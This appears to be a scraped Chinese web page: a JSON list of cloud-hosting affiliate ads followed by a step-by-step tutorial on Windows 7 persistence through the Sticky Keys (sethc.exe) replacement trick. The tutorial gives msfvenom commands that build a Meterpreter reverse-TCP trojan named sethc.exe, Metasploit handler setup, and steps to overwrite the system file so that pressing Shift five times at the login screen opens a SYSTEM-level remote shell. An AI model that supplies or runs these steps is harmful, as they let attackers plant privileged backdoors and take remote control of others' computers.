[{"createTime":1735734952000,"id":1,"img":"hwy_ms_500_252.jpeg","link":"https://activity.huaweicloud.com/cps.html?fromacct=261f35b6-af54-4511-a2ca-910fa15905d1&utm_source=V1g3MDY4NTY=&utm_medium=cps&utm_campaign=201905","name":"华为云秒杀","status":9,"txt":"华为云38元秒杀","type":1,"updateTime":1735747411000,"userId":3},{"createTime":1736173885000,"id":2,"img":"txy_480_300.png","link":"https://cloud.tencent.com/act/cps/redirect?redirect=1077&cps_key=edb15096bfff75effaaa8c8bb66138bd&from=console","name":"腾讯云秒杀","status":9,"txt":"腾讯云限量秒杀","type":1,"updateTime":1736173885000,"userId":3},{"createTime":1736177492000,"id":3,"img":"aly_251_140.png","link":"https://www.aliyun.com/minisite/goods?userCode=pwp8kmv3","memo":"","name":"阿里云","status":9,"txt":"阿里云2折起","type":1,"updateTime":1736177492000,"userId":3},{"createTime":1735660800000,"id":4,"img":"vultr_560_300.png","link":"https://www.vultr.com/?ref=9603742-8H","name":"Vultr","status":9,"txt":"Vultr送$100","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":5,"img":"jdy_663_320.jpg","link":"https://3.cn/2ay1-e5t","name":"京东云","status":9,"txt":"京东云特惠专区","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":6,"img":"new_ads.png","link":"https://www.iodraw.com/ads","name":"发布广告","status":9,"txt":"发布广告","type":1,"updateTime":1735660800000,"userId":3},{"createTime":1735660800000,"id":7,"img":"yun_910_50.png","link":"https://activity.huaweicloud.com/discount_area_v5/index.html?fromacct=261f35b6-af54-4511-a2ca-910fa15905d1&utm_source=aXhpYW95YW5nOA===&utm_medium=cps&utm_campaign=201905","name":"底部","status":9,"txt":"高性能云服务器2折起","type":2,"updateTime":1735660800000,"userId":3}]
操作系统: Windows 7 旗舰版
工具: kali系统的msfconsole
5次shift维权原理
Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限
除此以外,还可以使用其他工具替换sethc.exe
第一步,使用kali的msfconsole生成木马工具
1.开启MSF
msfconsole
2.使用开发模块
use exploit/multi/handler
3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f
exe -o sethc.exe
4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置
第二步,监听端口,接收反弹的shell
1.生成payload
set payload windows/meterpreter/reverse_tcp
2.设置反弹shell的位置( 自己的ip )
set lhost 192.168.18.128
3.设置反弹的端口
set lport 4444
4.开启监听
exploit
第三步,替换sethc.exe
将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe
源sethc.exe不能直接修改或删除,需要修改权限
第四步,5次shift触发sethc.exe并反弹shell
1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了
2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令